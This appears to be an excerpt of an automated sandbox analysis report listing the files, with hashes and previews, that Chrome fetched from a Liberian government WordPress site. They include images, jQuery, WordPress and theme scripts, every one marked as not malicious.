                                                                                                                        SHA-256:CCAA2C4AB9F4B11A0FDA67379800DDC035BC72D466DC2D1C079B663DB45E8ABF
                                                                                                                        SHA-512:902E5B96BE8ED4853CB4055CA3895428D6FD30271591C639B55853FFEA7AB8B642BABFE24D68E6305F27746CFCFB5BA8409F768D1167DFAAAB043EAD361FAA0C
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://www.lpb.gov.lr/wp-content/uploads/2024/01/logo-1-150x150.png
                                                                                                                        Preview:.PNG........IHDR.............<.q.....IDATx...w...U...9o..rUWwW.0.=.ar.4.Q.%D.H.D...`.6.....cl..?a..(.....&......+.o8........8`..k..{......<./=.....K./=.....K./=.......p...U!....RF.:.F..J.P.+K.0.!.t.#p.....(.3.qA....P&..+K.._r.K........J...6Q..'.[PeSI.p.-*q[@..FJ*.(.b.....8.tVZ:%........P..F.sZ.e..3\.}...Q......=....X..<n...C.:.'...)....#P.t.F3...1..I-....HXIFT%hP....*..A....Z. ..]..:.._..W..-..Vu+[2..j.W....b.]^.e.p.-.K&..Q.._X5_...H'.....2T...J.p.;....iZ..H..M4f*......Mb....x....B#.Q...Bk....u..m.e}.0..H......QBQ..@9....|..r.......\^;S........sB.....1g...\RV.G.q.})..w....J..XU..0V.eh.O.....-..w...T;'ob.....$....fP%...P..X.DA....dM...*.F.HI....H.......~.J.#.B8....0Rkb..J.5=.{W...pa.8..r..^j/.g/v..a..O.L=.ryI.A.._\._...E..{J...d\..Jp{..W.i...M..M.....M....Pe.8....~Y......G B.&G.IiK..zy.#,.I.I.b:E.D..t.Y.C.)J....i4N%...@8.v.%.TH.,.E)..H....)q.d%_bv.(.]}....Doq...n.....Gt..).l..._./......8..Xmv.yu......7....g.=r..A.+S..%.!}S........8T..X.;._;.R.2
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:PNG image data, 1536 x 1152, 8-bit/color RGB, non-interlaced
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):117919
                                                                                                                        Entropy (8bit):7.905769870036738
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:bhD6jApvM/RDfqRvmsobCcTyphdILUszAqUHMQBz/PQDUldNladyhj44Zr6VWuOE:wYeV6kWp3ILUszAXhJcYo8vZrrE
                                                                                                                        MD5:75C34A9E28E6C75A5F5488C785803FAA
                                                                                                                        SHA1:179070C4B00392E44E95B6336E23A9B55CCB35A7
                                                                                                                        SHA-256:D2478557517388C8B01CAC502678868EC7498C0E9003EF3B3EC2855C11C5AED1
                                                                                                                        SHA-512:3788D625810B295CFFFD2ABC7609142326A6855C8E8B911BDE9EA1252F0A914418306D2B98E4578F153491E4BFA2E2FDADC3AE14205141EFE5796BFCDDEA58BD
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:.PNG........IHDR.....................pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164460, 2020/05/12-16:04:17 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 21.2 (Windows)" xmp:CreateDate="2024-02-05T09:33:43Z" xmp:ModifyDate="2024-02-05T10:28:36Z" xmp:MetadataDate="2024-02-05T10:28:36Z" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:f7cbdc1c-a305-0d4b-92bb-9ecdbdc4ec0d" xmpMM:DocumentID="adobe:docid:ph
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):32
                                                                                                                        Entropy (8bit):4.476409765557392
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:HTEzthxRIK2YY:zQ3ul1
                                                                                                                        MD5:A6AE0FDB62A7BC6A11419A0B40EB4294
                                                                                                                        SHA1:A0509480F4D541E48E5E367372A315770AF298B0
                                                                                                                        SHA-256:4A7B308747CE4E4FA9D947B2D574CD2714B9C588A817717246F7AEEDC99E13DF
                                                                                                                        SHA-512:2844C9F5D563F580613E2C3B1957B8E502AB306D3B12FA2288394DBA316DB581916F84852DF8C3C3E340E409F2856221177704FD6BFFA8BD7CBC53BF0118E0EE
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSEAkmered8XflfRIFDbtXVmoSEAnvnK5JjY1whBIFDbtXVmo=?alt=proto
                                                                                                                        Preview:CgkKBw27V1ZqGgAKCQoHDbtXVmoaAA==
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):482
                                                                                                                        Entropy (8bit):4.626408410219915
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12:t41WffFcfbpmO7+iCC4Mfiz9DI9T5VN5Tlp9jyuyuH+/:t414fFmpmOaiCC4MfWRsN19jyHYk
                                                                                                                        MD5:212E30E47232BE03033A87DC58EDAA95
                                                                                                                        SHA1:4D69C4A3DC57503E08B76C774135BFE83E8B1F51
                                                                                                                        SHA-256:1F026BEB67630ABCDBC341651B1C17591AA76261296A9FB118793765964EB4E9
                                                                                                                        SHA-512:13F153263DBF35F91793E8F3FE7249CE87C4854620C2D97F79646C70BBB2F71C5C3759496FFD101FBC6EF9657B19595FE782200649A96473BECD1AD7DAE1F72E
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://s.w.org/images/core/emoji/15.0.3/svg/2705.svg
                                                                                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 36 36"><path fill="#77B255" d="M36 32c0 2.209-1.791 4-4 4H4c-2.209 0-4-1.791-4-4V4c0-2.209 1.791-4 4-4h28c2.209 0 4 1.791 4 4v28z"/><path fill="#FFF" d="M29.28 6.362c-1.156-.751-2.704-.422-3.458.736L14.936 23.877l-5.029-4.65c-1.014-.938-2.596-.875-3.533.138-.937 1.014-.875 2.596.139 3.533l7.209 6.666c.48.445 1.09.665 1.696.665.673 0 1.534-.282 2.099-1.139.332-.506 12.5-19.27 12.5-19.27.751-1.159.421-2.707-.737-3.458z"/></svg>
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with very long lines (4741)
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):4776
                                                                                                                        Entropy (8bit):5.153085086858448
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:96:vmK40IdSs6c7DE/3sc/YrEBnUBPwKxbqe/Ds91sBYt1Em4kCofWQRemN:OK40IdS/cHg3NZBnUJbqe/DeGYtu7kC6
                                                                                                                        MD5:C6FDDBB6BE69793478DE26FC245B2ACF
                                                                                                                        SHA1:A136EBF5054FDC19729B3592005FE0FEFEC4BB4C
                                                                                                                        SHA-256:9A1E0D38B691F1D22A92CFF65EC0439B428170AC39A4493C7ECB06D5585F56A3
                                                                                                                        SHA-512:8A766304CAA9C888CFCAB64EABAB906905965E7FBCFC4F79C74AB122B892456ABAD215D0883DF17023A16A18BA15A6A4B3D0FA5345CAB7173D778F725B827C33
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:/*! This file is auto-generated */.(()=>{"use strict";var t={d:(e,n)=>{for(var r in n)t.o(n,r)&&!t.o(e,r)&&Object.defineProperty(e,r,{enumerable:!0,get:n[r]})},o:(t,e)=>Object.prototype.hasOwnProperty.call(t,e),r:t=>{"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})}},e={};t.r(e),t.d(e,{actions:()=>P,addAction:()=>A,addFilter:()=>m,applyFilters:()=>w,applyFiltersAsync:()=>I,createHooks:()=>h,currentAction:()=>x,currentFilter:()=>T,defaultHooks:()=>f,didAction:()=>j,didFilter:()=>z,doAction:()=>g,doActionAsync:()=>k,doingAction:()=>O,doingFilter:()=>S,filters:()=>Z,hasAction:()=>_,hasFilter:()=>v,removeAction:()=>p,removeAllActions:()=>F,removeAllFilters:()=>b,removeFilter:()=>y});const n=function(t){return"string"!=typeof t||""===t?(console.error("The namespace must be a non-empty string."),!1):!!/^[a-zA-Z][a-zA-Z0-9_.\-\/]*$/.test(t)||(console.error("The namespace can only conta
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with very long lines (1732)
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):1830
                                                                                                                        Entropy (8bit):5.016598452784215
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:bcxbor721bordKIEKmPc/mPRKmPrG/mPfKmPEMy4XQUdbz:qbor7obordk
                                                                                                                        MD5:2FCD6F71A7127832A97B771A9FE5482B
                                                                                                                        SHA1:61643E25A6FC0B2B5CD3315D100970053DB45D20
                                                                                                                        SHA-256:AEAE8BA7D9C8EE997A8DDB5F5EC82381ED7851B750E4D1F466A1F19FAD7A8462
                                                                                                                        SHA-512:FF8FF5EA489ED8C258F5161863C86911A1B5AEC86FC848AEE5D95FAB9EB69262F057E58EAAF2A9CEF804998CB8FA46206E399C542CCBFCFED00765FDB70173B3
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://www.lpb.gov.lr/wp-content/themes/betheme/assets/animations/animations.min.js?ver=27.0.7
                                                                                                                        Preview:/**. * Animations v1.4. * Copyright 2014, Joe Mottershaw, https://github.com/joemottershaw/. */..function animateElement(){jQuery(".animate").each(jQuery(window).width()>=96?function(a,n){var n=jQuery(n),i=jQuery(this).attr("data-anim-type"),t=jQuery(this).attr("data-anim-delay");n.visible(!0)&&setTimeout(function(){n.addClass(i)},t)}:function(a,n){var n=jQuery(n),i=jQuery(this).attr("data-anim-type"),t=jQuery(this).attr("data-anim-delay");setTimeout(function(){n.addClass(i)},t)})}function randomClass(){var a=Math.ceil(Math.random()*classAmount);return classesArray[a]}function animateOnce(a,n){"random"==n&&(n=randomClass()),jQuery(a).removeClass("trigger infinite "+triggerClasses).addClass("trigger").addClass(n).one("webkitAnimationEnd oAnimationEnd MSAnimationEnd animationend",function(){jQuery(this).removeClass("trigger infinite "+triggerClasses)})}function animateInfinite(a,n){"random"==n&&(n=randomClass()),jQuery(a).removeClass("trigger infinite "+triggerClasses).addClass("trigger
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with very long lines (12512), with no line terminators
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):12512
                                                                                                                        Entropy (8bit):5.195361378621815
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:384:wwuf8OQL0sARrAZcNWL//+Ffm/hibLexa2VautyX2fsL3ZHO1O9H:wwuf8OQL0sAZAGNWrGcibLexa2Vau0XD
                                                                                                                        MD5:2E187162915B1D22FD4558FEE30F5613
                                                                                                                        SHA1:3C76D4209FDBCBD3650655852AD4ED73846E15FF
                                                                                                                        SHA-256:6D60E3B25E56D35148888B5A08C8EB0FF3806F9698D4F6F54A35EAB7D27F4C2F
                                                                                                                        SHA-512:01948A902DE67801566637EC99D82302A8DA9B80A31DE08FB1F2C0D52AEA3BEAFA804188471320410850F0E96F4BA4C34F6CAC6EBB6081359F2E959A2C6027C5
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://www.lpb.gov.lr/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=6.0.2
                                                                                                                        Preview:(()=>{"use strict";var t={d:(e,i)=>{for(var s in i)t.o(i,s)&&!t.o(e,s)&&Object.defineProperty(e,s,{enumerable:!0,get:i[s]})},o:(t,e)=>Object.prototype.hasOwnProperty.call(t,e),r:t=>{"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})}},e={};function i(t){if(this.formData={},this.tree={},!(t instanceof FormData))return this;this.formData=t;const e=()=>{const t=new Map;return t.largestIndex=0,t.set=function(e,i){""===e?e=t.largestIndex++:/^[0-9]+$/.test(e)&&(e=parseInt(e),t.largestIndex<=e&&(t.largestIndex=e+1)),Map.prototype.set.call(t,e,i)},t};this.tree=e();const i=/^(?<name>[a-z][-a-z0-9_:]*)(?<array>(?:\[(?:[a-z][-a-z0-9_:]*|[0-9]*)\])*)/i;for(const[t,s]of this.formData){const o=t.match(i);if(o)if(""===o.groups.array)this.tree.set(o.groups.name,s);else{const t=[...o.groups.array.matchAll(/\[([a-z][-a-z0-9_:]*|[0-9]*)\]/gi)].map((([t,e])=>e));t.unshift(o.groups.name);const i=t.pop
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with very long lines (65447)
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):87553
                                                                                                                        Entropy (8bit):5.262620498676155
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:0RUX9uDgwxcy2KVBNwchN6SLaHEk2BSrBESp+a/IEk4aAocVi8SMBQ47GKO:sHNwcv9VBQpLl88SMBQ47GKO
                                                                                                                        MD5:826EB77E86B02AB7724FE3D0141FF87C
                                                                                                                        SHA1:79CD3587D565AFE290076A8D36C31C305A573D18
                                                                                                                        SHA-256:CB6F2D32C49D1C2B25E9FFC9AAAFA3F83075346C01BCD4AE6EB187392A4292CF
                                                                                                                        SHA-512:FC79FDB76763025DC39FAC045A215FF155EF2F492A0E9640079D6F089FA6218AF2B3AB7C6EAF636827DEE9294E6939A95AB24554E870C976679C25567AD6374C
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://www.lpb.gov.lr/wp-includes/js/jquery/jquery.min.js?ver=3.7.1
                                                                                                                        Preview:/*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(ie,e){"use strict";var oe=[],r=Object.getPrototypeOf,ae=oe.slice,g=oe.flat?function(e){return oe.flat.call(e)}:function(e){return oe.concat.apply([],e)},s=oe.push,se=oe.indexOf,n={},i=n.toString,ue=n.hasOwnProperty,o=ue.toString,a=o.call(Object),le={},v=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},y=function(e){return null!=e&&e===e.window},C=ie.document,u={type:!0,src:!0,nonce:!0,noModule:!0};function m(e,t,n){var r,i,o=(n=n||C).createElement("script");if(o.text=e,t)for(r in u)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.remove
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with very long lines (15752)
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):18726
                                                                                                                        Entropy (8bit):4.756109283632968
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:384:WTbvzWuPTb9Uh3o//bEPjXgA2k1efAJmpr:WX6U9Uh3o//YrXgAGfACr
                                                                                                                        MD5:B976B651932BFD25B9DDB5B7693D88A7
                                                                                                                        SHA1:7FCB7CB5C11227F9213B1E08A07D0212209E1432
                                                                                                                        SHA-256:4E6CE5444C7F396CEF0EB1FA3611034151E485DD06FBE5573A5583E1EEBC98C3
                                                                                                                        SHA-512:A241EBDCFAF153D5C2A86761145B2575CBE734B4F416ACBFAC082AE5C6EB7C706BD6CA3BC286B7E1A0F9E326729252DCB95B776750C4A3A0D81F2AA6258EA39F
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://www.lpb.gov.lr/wp-includes/js/wp-emoji-release.min.js?ver=6.7.1
                                                                                                                        Preview:/*! This file is auto-generated */.// Source: wp-includes/js/twemoji.min.js.var twemoji=function(){"use strict";var h={base:"https://cdn.jsdelivr.net/gh/jdecked/twemoji@15.0.3/assets/",ext:".png",size:"72x72",className:"emoji",convert:{fromCodePoint:function(d){d="string"==typeof d?parseInt(d,16):d;if(d<65536)return e(d);return e(55296+((d-=65536)>>10),56320+(1023&d))},toCodePoint:o},onerror:function(){this.parentNode&&this.parentNode.replaceChild(x(this.alt,!1),this)},parse:function(d,u){u&&"function"!=typeof u||(u={callback:u});return h.doNotParse=u.doNotParse,("string"==typeof d?function(d,a){return n(d,function(d){var u,f,c=d,e=N(d),b=a.callback(e,a);if(e&&b){for(f in c="<img ".concat('class="',a.className,'" ','draggable="false" ','alt="',d,'"',' src="',b,'"'),u=a.attributes(d,e))u.hasOwnProperty(f)&&0!==f.indexOf("on")&&-1===c.indexOf(" "+f+"=")&&(c=c.concat(" ",f,'="',u[f].replace(t,r),'"'));c=c.concat("/>")}return c})}:function(d,u){var f,c,e,b,a,t,r,n,o,s,i,l=function d(u,f){v
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with very long lines (480)
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):608
                                                                                                                        Entropy (8bit):5.1693559575691825
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12:UoAgXf2AEcAM6VjcppDWvtkKiRPWgJWfWM0n:lAgX7fSIqvtkrRzThn
                                                                                                                        MD5:5D4AE3C17238C7D37F7BB54F61632CC6
                                                                                                                        SHA1:64819D2B67C84697489945BCBEBB587BDB08AEDC
                                                                                                                        SHA-256:8ECF312A51FD23A6D2258191745AB900D7F393A4633515E0DF6305CDE42B1A3A
                                                                                                                        SHA-512:E165CD38EBF7D971CD450F81F7ED2D4FDF115DAA57BBC28FE957E6FCB35AF67F145182EE0AA0947BA002D872BAA680BF02C68437932B9E6C365B8B3B347B6935
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://www.lpb.gov.lr/wp-content/themes/betheme/js/plugins/visible.min.js?ver=27.0.7
                                                                                                                        Preview:/**. * Visible. * required for: One Page Active. * Sam Sehnert, samatdf, TeamDF | https://github.com/teamdf/jquery-visible/. */.(function(e){e.fn.visible=function(t,n,r){var i=e(this).eq(0),s=i.get(0),o=e(window),u=o.scrollTop(),a=u+o.height(),f=o.scrollLeft(),l=f+o.width(),c=i.offset().top,h=c+i.height(),p=i.offset().left,d=p+i.width(),v=t===true?h:c,m=t===true?c:h,g=t===true?d:p,y=t===true?p:d,b=n===true?s.offsetWidth*s.offsetHeight:true,r=r?r:"both";if(r==="both")return!!b&&m<=a&&v>=u&&y<=l&&g>=f;else if(r==="vertical")return!!b&&m<=a&&v>=u;else if(r==="horizontal")return!!b&&y<=l&&g>=f}})(jQuery);
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):4049
                                                                                                                        Entropy (8bit):4.596263386141431
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:96:fmi/ERn8Ets9xca12/ARUR4BNxdTmkoFPhpuLvr:fmMERnjt4xIEBNeTFZp2T
                                                                                                                        MD5:8DEFF7985DB0AB5EEEB88C9039438C61
                                                                                                                        SHA1:631008039E2D67299CA555589B719CFBF273ED39
                                                                                                                        SHA-256:19906E9585E0F90C005878EE2C63FCD8D1ED933A0EF6BEA16BB1A2226B075B40
                                                                                                                        SHA-512:31D15201401990A1EE4FBF43D35D8B9E31E38CA49A6034927D2BF6886F2BDB79A3765ADC278F9FB68EB9E059446D64525818B8FC897D5C1B78645B8136C8E1AB
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://www.lpb.gov.lr/wp-content/themes/betheme/js/parallax/translate3d.js?ver=27.0.7
                                                                                                                        Preview:/**. * Parallax. *. * Translate3d. * 1.0 | Muffin Group. */..var mfnSetup = {. translate: null.};..(function($) {.. /* globals jQuery */.. "use strict";.. /**. * mfnSetup. */.. // has3d.. var has3d = function() {.. if (!window.getComputedStyle) {. return false;. }.. var el = document.createElement('div'),. has3d;.. document.body.insertBefore(el, null);.. if (el.style.transform !== undefined) {. el.style.transform = "translate3d(1px,1px,1px)";. has3d = window.getComputedStyle(el).getPropertyValue('transform');. }.. document.body.removeChild(el);.. return (has3d !== undefined && has3d !== null && has3d.length > 0 && has3d !== "none");. };.. // __construct.. var __construct = function() {.. if (has3d()) {.. mfnSetup.translate = function(el, x, y) {. el.css('transform', 'translate3d(' + x + ', ' + y + ', 0)');. };.. } else {.. mfnSetup.translate = function(el, x, y) {. el.css({. "left": x,.
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with very long lines (2564), with no line terminators
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):2564
                                                                                                                        Entropy (8bit):5.014409781329547
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:Cci921RdiWA1RReysWmF+3TBCa+CAiWd95y/UPzBVAVVKpO6TytiS4lNRh1Pp1Rr:Cd921R0WA1T/sWmF+3lCa+CTWd95ycPz
                                                                                                                        MD5:963406E751251AFFCB02EBAED80B7671
                                                                                                                        SHA1:54AA99EA5016D84702552BBEFB69E6595FE9641D
                                                                                                                        SHA-256:60B3356E6EA723CCE9788C072961E89AEEA21E43D3F4099545CBDE49A4E10CF9
                                                                                                                        SHA-512:F008619D3B3757EBCEFB449CDB8E0705CF5EEDF6D01283095DA91398490D0EC7A4DCCCB77C19BDD6930B9576F74A321E6C50007C275696136EEAC15B929240CD
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://www.lpb.gov.lr/wp-content/uploads/betheme/css/post-2.css?ver=1736517284
                                                                                                                        Preview:.mcb-section-2a3c5d67d{margin-bottom:-19px;}.mcb-section .mcb-wrap .mcb-item-yezomh0zc .column_attr{text-align:center;color:#FFFFFF;font-size:40px;font-weight:500;}.mcb-section .mcb-wrap .mcb-item-0eccqel2r .column_attr{text-align:center;color:#FFFFFF;font-size:25px;font-weight:400;letter-spacing:1px;line-height:30px;}.mcb-section .mcb-wrap .mcb-item-0eccqel2r .mcb-column-inner-0eccqel2r{margin-bottom:-33px;margin-top:18px;padding-right:103px;padding-left:103px;}.mcb-section-nyu46968ls{margin-top:48px;margin-bottom:-60px;}.mcb-section-m77lu08m{margin-top:55px;}.mcb-section .mcb-wrap .mcb-item-43b9t2xq .blog_slider .blog_slider_header .button, .mcb-section .mcb-wrap .mcb-item-43b9t2xq .blog_slider .blog_slider_header .button .button_icon i{color:#006634;}.mcb-section .mcb-wrap .mcb-item-43b9t2xq .blog_slider_ul li .desc hr{background:#006634;}.mcb-section .mcb-wrap .mcb-item-43b9t2xq .blog_slider .button{color:#006634;}.mcb-section .mcb-wrap .mcb-item-43b9t2xq .blog_slider_ul li .desc h
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with very long lines (45047), with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):165505
                                                                                                                        Entropy (8bit):5.529216472227982
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3072:x7079mB8Nkhk8fbZNAla86MFzW3c4g7bCizAHu:xY9mB+kK8j7AlhbM0rf
                                                                                                                        MD5:7722BAA787DEC6F4E3831067D4CEA8F8
                                                                                                                        SHA1:ACE1624F275BC847A9B0B6D11DF6284515A6C63F
                                                                                                                        SHA-256:52984E532D02A87A060764FF400626A1B81CC316284A8BA1FEAB5D94697119A0
                                                                                                                        SHA-512:14CFEDC0400368AC4050EC50607C24F7DCCABFF60E02640427EEB18683B248C29D479D7ECD9E6E4B6B2BA228798CBF3809E22AC9E36A87D073E7FB0F153D6786
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:!function(t){var e={};function n(r){if(e[r])return e[r].exports;var i=e[r]={i:r,l:!1,exports:{}};return t[r].call(i.exports,i,i.exports,n),i.l=!0,i.exports}n.m=t,n.c=e,n.d=function(t,e,r){n.o(t,e)||Object.defineProperty(t,e,{enumerable:!0,get:r})},n.r=function(t){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})},n.t=function(t,e){if(1&e&&(t=n(t)),8&e)return t;if(4&e&&"object"==typeof t&&t&&t.__esModule)return t;var r=Object.create(null);if(n.r(r),Object.defineProperty(r,"default",{enumerable:!0,value:t}),2&e&&"string"!=typeof t)for(var i in t)n.d(r,i,function(e){return t[e]}.bind(null,i));return r},n.n=function(t){var e=t&&t.__esModule?function(){return t.default}:function(){return t};return n.d(e,"a",e),e},n.o=function(t,e){return Object.prototype.hasOwnProperty.call(t,e)},n.p="",n(n.s=1)}([function(t,e){t.exports=jQuery},function(t,e,n){n(2),n(6),t.exports=n(4)},function(t,e,n
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:PNG image data, 1536 x 1152, 8-bit/color RGB, non-interlaced
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):2579369
                                                                                                                        Entropy (8bit):7.961868189915569
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:49152:7cZtWP+C83t6UbXjnSqZcDqro4VXQAZQSaGhnVY5kKtsY8XrTTYUOLJz9M:7cXCqcUrzSicDqvV5x7AkKaYST+/M
                                                                                                                        MD5:B364E6F92991BB52F9BB1563996733BF
                                                                                                                        SHA1:BDC6C8F8C6FF1858FED73A8A4EA8F97F5113F7EB
                                                                                                                        SHA-256:0D90D98D6C223E0FE7025237560AA57C821B6B9EF5DAE91E307D18E24636C0D9
                                                                                                                        SHA-512:004C908BB32BD6C99AE4D35DDCB67C32F648A5BDA1267384B586B9CA00B80FF1CFFC22985028F63DF093E4871FC68D40E1B5B99D54A09F6F1353E18AF4105BF5
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:.PNG........IHDR.....................pHYs................PiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164460, 2020/05/12-16:04:17 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:exif="http://ns.adobe.com/exif/1.0/" xmpMM:DocumentID="adobe:docid:photoshop:fb1dc683-5ed9-b646-9198-6bcc13239b29" xmpMM:InstanceID="xmp.iid:3e922ac1-1a00-7046-b128-92e5d6655a30" xmpMM:OriginalDocumentID="95BEA589391C7E10A2A2D9F16F0E45C0" dc:format="image/png" photoshop:LegacyIPTCDigest="E8F15CF32F
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with very long lines (13479)
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):13577
                                                                                                                        Entropy (8bit):5.272065782731947
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:5rprDN+sag6ifKIUpQI99P1tLm9kdgyq1+J3aCJQ+h4MPLORq:5rprxaefKI0LP19m4q1WW+h4Mjp
                                                                                                                        MD5:9FFEB32E2D9EFBF8F70CAABDED242267
                                                                                                                        SHA1:3AD0C10E501AC2A9BFA18F9CD7E700219B378738
                                                                                                                        SHA-256:5274F11E6FB32AE0CF2DFB9F8043272865C397A7C4223B4CFA7D50EA52FBDE89
                                                                                                                        SHA-512:8D6BE545508A1C38278B8AD780C3758AE48A25E4E12EEE443375AA56031D9B356F8C90F22D4F251140FA3F65603AF40523165E33CAE2E2D62FC78EC106E3D731
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://www.lpb.gov.lr/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1
